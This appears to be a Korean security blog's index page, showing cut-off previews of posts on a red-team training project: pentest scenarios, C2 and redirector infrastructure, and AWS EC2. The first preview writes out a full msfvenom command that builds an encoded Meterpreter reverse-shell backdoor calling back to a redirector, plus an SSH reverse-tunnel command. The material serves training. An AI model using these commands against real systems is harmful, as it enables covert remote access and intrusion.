SEO

본 시나리오와 실습은 금융보안아카데미 내 금붕어 아카데미 팀 프로젝트에서 진행하였습니다.   시나리오 기반 펜테스팅1. 공격 준비msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai 0i 5 -b '\x00' LHOST=[리다이렉터 IP] LPORT=80 -f exe > payload.exe리버스 쉘을 연결하는 Meterpreter 백도어를 생성하였습니다. ssh -i goldfish-redteam ubuntu@[EC2 IP] -R [EC2 아웃바운드 포트 번호]:127.0.0.1:[KALI 인바운드 포트 번호]HTTP 리다이렉터(EC2)의 2222 포트로 나가는 트래픽을 칼리의 4321 포트 전송합니다. sudo socat tcp-list..

최근 포트폴리오를 다시 정리하면서 이전에 올렸어야했던(까먹고 올리지 않았던) 다수의 문서를 발견했습니다 하하하사실 이번 문서는 CVE-2022-26923 PoC와 Sigma 룰을 포스팅한 이후에 작성하려고 임시저장하고 있던 글이었는데 업로드 시간이 점점 늦어지는 것 같아서 먼저 업로드하게 되었습니다. 그래서 이야기의 선후가 좀 맞지 않을 수도 있다는 점 감안하고 읽어주시면 감사하겠습니다 :)지금부터라도 다시 정리해서 올려보려고 합니다...    본 시나리오와 실습은 금융보안아카데미 내 금붕어 아카데미 팀 프로젝트에서 진행하였습니다. 공격 시나리오사진과 같은 구조로 구축된 홈랩과 레드팀 환경에서 공격을 수행하였습니다. 전체 시나리오 요약은 위와 같습니다. 사실 시나리오 작성부터 쉽지 않았습니다 하하위 내용..

레드팀 인프라는 실제 기업 인프라에서 요구되는 신뢰성, 안전성 등의 공통사항 뿐만 아니라, 블루팀이 공격 캠페인이 탐지하지 못하도록 보안 및 난독화의 추가적인 계층을 필요로 합니다.  일반적으로 레드팀 인프라는 위 사진과 같은 구조를 가진다고 합니다.피싱/페이로드 서버 : 피싱 캠페인 및 페이로드 코드를 저장하는데 사용C2 서버 : 레드티밍을 위한 명령 제어 서버리다이렉터 : 피해자 환경과의 통신에서 트래픽의 프록시 역할을 하며, C2 서버를 숨기기 위한 용도 저는 그루트 유튜브를 통해 레드팀 인프라를 구축하였고, 피싱 메일 서버는 현재 프로젝트에서 사용되지 않아 C2 서버와 리다이렉터로 구성하였습니다. https://www.youtube.com/watch?v=LzqouelitiE&t=122s  리다이렉..

오늘은 레드팀 인프라 구축을 위해 사용되는 AWS 서비스들을 포스팅해보려고 합니다.저도 레드티밍을 공부하며 작성하는 글이라 잘못된 정보가 있다면 바로 수정하도록 하겠습니다! EC2 (Elastic Compute Cloud)EC2는 AWS에서 제공하는 가상 서버 서비스로, 레드팀 공간에서 그레이 공간에 속하는 서버들을 생성할 수 있어 유용합니다.이러한 EC2는 다음과 같은 특징을 가집니다. 다양한 운영체제 지원 (Linux, Windows 등)필요에 따른 빠른 서버 확장 및 축소 가능다양한 인스턴스 타입 제공 (컴퓨팅 최적화, 메모리 최적화 등)구축한 레드팀 공간에서 EC2를 C&C 서버의 트래픽을 송수신하기 위한 HTTP 리다이렉터 및 피싱 캠페인용 서버로 사용하였습니다. 이외에도 EC2 자체에 C&C ..